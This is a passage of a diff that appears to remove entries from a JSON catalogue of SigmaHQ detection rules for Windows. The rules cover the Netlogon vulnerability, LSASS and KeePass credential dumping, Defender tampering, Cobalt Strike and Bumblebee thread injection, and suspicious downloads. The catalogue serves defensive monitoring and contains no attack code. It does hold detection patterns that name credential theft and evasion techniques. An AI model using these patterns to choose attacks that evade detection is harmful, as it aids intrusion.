- ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", - "value": "Vulnerable Netlogon Secure Channel Connection Allowed", - "meta": { - "refs": [ - "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2020/09/15", - "filename": "win_system_vul_cve_2020_1472.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "value": "Exploit SamAccountName Spoofing with Kerberos", - "meta": { - "refs": [ - "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2021/12/15", - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule 
detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.", - "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", - "value": "Rare Scheduled Task Creations", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_rare_schtask_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.s0111", - "attack.t1053.005" - ], - "creation_date": "2017/03/17", - "filename": "win_rare_schtask_creation.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Software installation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", - "value": "Suspicious Scheduled Tasks Locations", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_task_scheduler_susp_task_locations.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/12/05", - "filename": "win_task_scheduler_susp_task_locations.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", - "value": "Ngrok Usage with Remote Desktop Service", - "meta": { - "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", - "https://ngrok.com/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2022/04/29", - "filename": "win_terminalservices_rdp_ngrok.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Access to LSASS Process", - "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "value": "LSASS Access Detected via Attack Surface Reduction", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2018/08/26", - "filename": "win_defender_alert_lsass_access.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects triggering of AMSI by Windows Defender.", - "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "value": "Windows Defender AMSI Trigger Detected", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/09/14", - "filename": "win_defender_amsi_trigger.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects disabling Windows Defender threat protection", - "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "value": "Windows Defender Threat Detection Disabled", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/07/28", - "filename": "win_defender_disabled.yml", - "author": "J\u00e1n Tren\u010dansk\u00fd, frack113", - "level": "low", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Setting of Windows Defender Exclusions", - "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "value": "Windows Defender Exclusions Added", - "meta": { - "refs": [ - "https://twitter.com/_nullbind/status/1204923340810543109", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/06", - "filename": "win_defender_exclusions.yml", - "author": "Christian Burkard", - "level": "medium", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "value": "Windows Defender Exploit Guard Tamper", - "meta": { - "refs": [ - 
"https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/08/05", - "filename": "win_defender_exploit_guard_tamper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", - "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", - "value": "Windows Defender Malware Detection History Deletion", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001" - ], - "creation_date": "2020/08/13", - "filename": "win_defender_history_delete.yml", - "author": "Cian Heasley", - "level": "high", - "falsepositive": [ - "Deletion of Defender malware detections history for legitimate reasons" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "value": "PSExec and WMI Process Creations Block", - "meta": { - "refs": [ - 
"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands",
- "https://twitter.com/duff22b/status/1280166329660497920",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.lateral_movement",
- "attack.t1047",
- "attack.t1569.002"
- ],
- "creation_date": "2020/07/14",
- "filename": "win_defender_psexec_wmi_asr.yml",
- "author": "Bhabesh Raj",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection",
- "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856",
- "value": "Microsoft Defender Tamper Protection Trigger",
- "meta": {
- "refs": [
- "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ],
- "creation_date": "2021/07/05",
- "filename": "win_defender_tamper_protection_trigger.yml",
- "author": "Bhabesh Raj",
- "level": "high",
- "falsepositive": [
- "Administrator actions"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects all actions taken by Windows Defender malware detection engines",
- "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708",
- "value": "Windows Defender Threat Detected",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ],
- "creation_date": "2020/07/28",
- "filename": "win_defender_threat.yml",
- "author": "J\u00e1n Tren\u010dansk\u00fd",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.",
- "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b",
- "value": "WMI Persistence",
- "meta": {
- "refs": [
- "https://twitter.com/mattifestation/status/899646620148539397",
- "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1546.003"
- ],
- "creation_date": "2017/08/22",
- "filename": "win_wmi_persistence.yml",
- "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community",
- "level": "medium",
- "falsepositive": [
- "Unknown (data set is too small; further testing needed)"
- ],
- "logsource.category": "No established category",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects remote thread injection events based on action seen used by bumblebee",
- "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda",
- "value": "Bumblebee Remote Thread Creation",
- "meta": {
- "refs": [
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution",
- "attack.t1218.011",
- "attack.t1059.001"
- ],
- "creation_date": "2022/09/27",
- "filename": "create_remote_thread_win_bumblebee.yml",
- "author": "Nasreddine Bencherchali",
- 
"level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects remote thread creation from CACTUSTORCH as described in references.",
- "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40",
- "value": "CACTUSTORCH Remote Thread Creation",
- "meta": {
- "refs": [
- "https://twitter.com/SBousseaden/status/1090588499517079552",
- "https://github.com/mdsecactivebreach/CACTUSTORCH",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1055.012",
- "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007",
- "attack.t1218.005"
- ],
- "creation_date": "2019/02/01",
- "filename": "create_remote_thread_win_cactustorch.yml",
- "author": "@SBousseaden (detection), Thomas Patzke (rule)",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons",
- "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42",
- "value": "CobaltStrike Process Injection",
- "meta": {
- "refs": [
- "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f",
- "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1055.001"
- ],
- "creation_date": "2018/11/30",
- "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml",
- "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": 
"create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process",
- "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee",
- "value": "CreateRemoteThread API and LoadLibrary",
- "meta": {
- "refs": [
- "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1055.001"
- ],
- "creation_date": "2019/08/11",
- "filename": "create_remote_thread_win_loadlibrary.yml",
- "author": "Roberto Rodriguez @Cyb3rWard0g",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity",
- "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a",
- "value": "KeePass Password Dumping",
- "meta": {
- "refs": [
- "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a",
- "https://github.com/denandz/KeeFarce",
- "https://github.com/GhostPack/KeeThief",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1555.005"
- ],
- "creation_date": "2022/04/22",
- "filename": "create_remote_thread_win_password_dumper_keepass.yml",
- "author": "Timon Hackenjos",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. 
A single execution can lead to hundreds of events.\n",
- "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505",
- "value": "Password Dumper Remote Thread in LSASS",
- "meta": {
- "refs": [
- "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.s0005",
- "attack.t1003.001"
- ],
- "creation_date": "2017/02/19",
- "filename": "create_remote_thread_win_password_dumper_lsass.yml",
- "author": "Thomas Patzke",
- "level": "high",
- "falsepositive": [
- "Antivirus products"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of a remote thread from a Powershell process to another process",
- "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50",
- "value": "Accessing WinAPI in PowerShell. Code Injection",
- "meta": {
- "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2020/10/06",
- "filename": "create_remote_thread_win_powershell_code_injection.yml",
- "author": "Nikita Nazarov, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects PowerShell remote thread creation in Rundll32.exe",
- "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e",
- "value": "PowerShell Rundll32 Remote Thread Creation",
- "meta": {
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution",
- "attack.t1218.011",
- "attack.t1059.001"
- ],
- "creation_date": "2018/06/25",
- "filename": "create_remote_thread_win_susp_powershell_rundll32.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n",
- "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119",
- "value": "Suspicious Remote Thread Source",
- "meta": {
- "refs": [
- "Personal research, statistical analysis",
- "https://lolbas-project.github.io",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.defense_evasion",
- "attack.t1055"
- ],
- "creation_date": "2019/10/27",
- "filename": "create_remote_thread_win_susp_remote_thread_source.yml",
- "author": "Perez Diego (@darkquassar), oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or 
outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n",
- "uuid": "f016c716-754a-467f-a39e-63c06f773987",
- "value": "Suspicious Remote Thread Target",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2022/08/25",
- "filename": "create_remote_thread_win_susp_remote_thread_target.yml",
- "author": "Florian Roth",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a remote thread creation in suspicious target images",
- "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03",
- "value": "Remote Thread Creation in Suspicious Targets",
- "meta": {
- "refs": [
- "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055.003"
- ],
- "creation_date": "2022/03/16",
- "filename": "create_remote_thread_win_susp_targets.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a remote thread creation of Ttdinject.exe used as proxy",
- "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16",
- "value": "Remote Thread Creation Ttdinject.exe Proxy",
- "meta": {
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1127"
- ],
- "creation_date": "2022/05/16",
- "filename": "create_remote_thread_win_ttdinjec.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)",
- "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821",
- "value": "Executable in ADS",
- "meta": {
- "refs": [
- "https://twitter.com/0xrawsec/status/1002478725605273600?s=21",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.s0139",
- "attack.t1564.004"
- ],
- "creation_date": "2018/06/03",
- "filename": "create_stream_hash_ads_executable.yml",
- "author": "Florian Roth, @0xrawsec",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_stream_hash",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers",
- "uuid": "573df571-a223-43bc-846e-3f98da481eca",
- "value": "Creation Of a Suspicious ADS File Outside a Browser Download",
- "meta": {
- "refs": [
- "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ],
- "creation_date": "2022/10/22",
- "filename": "create_stream_hash_creation_internet_file.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Other legitimate browsers not currently 
included in the filter (please add them)",
- "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)"
- ],
- "logsource.category": "create_stream_hash",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool",
- "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f",
- "value": "Hacktool Download",
- "meta": {
- "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.s0139",
- "attack.t1564.004"
- ],
- "creation_date": "2022/08/24",
- "filename": "create_stream_hash_hacktool_download.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_stream_hash",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Exports the target Registry key and hides it in the specified alternate data stream.",
- "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84",
- "value": "Exports Registry Key To an Alternate Data Stream",
- "meta": {
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564.004"
- ],
- "creation_date": "2020/10/07",
- "filename": "create_stream_hash_regedit_export_to_ads.yml",
- "author": "Oddvar Moe, Sander Wiebing, oscd.community",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_stream_hash",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the download of suspicious file type from a well-known file 
and paste sharing domain",
- "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464",
- "value": "Suspicious File Download from File Sharing Domain",
- "meta": {
- "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.s0139",
- "attack.t1564.004"
- ],
- "creation_date": "2022/08/24",
- "filename": "create_stream_hash_susp_domain_ext_combo.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_stream_hash",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain",
- "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99",
- "value": "Unusual File Download from File Sharing Domain",
- "meta": {
- "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.s0139",
- "attack.t1564.004"
- ],
- "creation_date": "2022/08/24",
- "filename": "create_stream_hash_susp_domain_ext_combo_med.yml",
- "author": "Florian Roth",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_stream_hash",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the download of suspicious file type from URLs with IP",
- "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368",
- "value": "Unusual File Download from Direct IP Address",
- "meta": {
- "refs": [
- 
"https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564.004"
- ],
- "creation_date": "2022/09/07",
- "filename": "create_stream_hash_susp_ip_domains.yml",
- "author": "Nasreddine Bencherchali, Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "create_stream_hash",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n",
- "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52",
- "value": "Query To Remote Access Software Domain",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution",
- "https://redcanary.com/blog/misbehaving-rats/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_remote_access_software_domains.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/07/11",
- "filename": "dns_query_remote_access_software_domains.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "FP may be caused in legitimate usage of the softwares mentioned above"
- ],
- "logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes",
- "uuid": "065cceea-77ec-4030-9052-fc0affea7110",
- "value": "DNS Query for Anonfiles.com Domain",
- "meta": {
- "refs": [
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1567.002"
- ],
- "creation_date": "2022/07/15",
- "filename": "dns_query_win_anonymfiles_com.yml",
- "author": "pH-T",
- "level": "high",
- "falsepositive": [
- "Legitimate access to anonfiles.com"
- ],
- 
"logsource.category": "dns_query",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service",
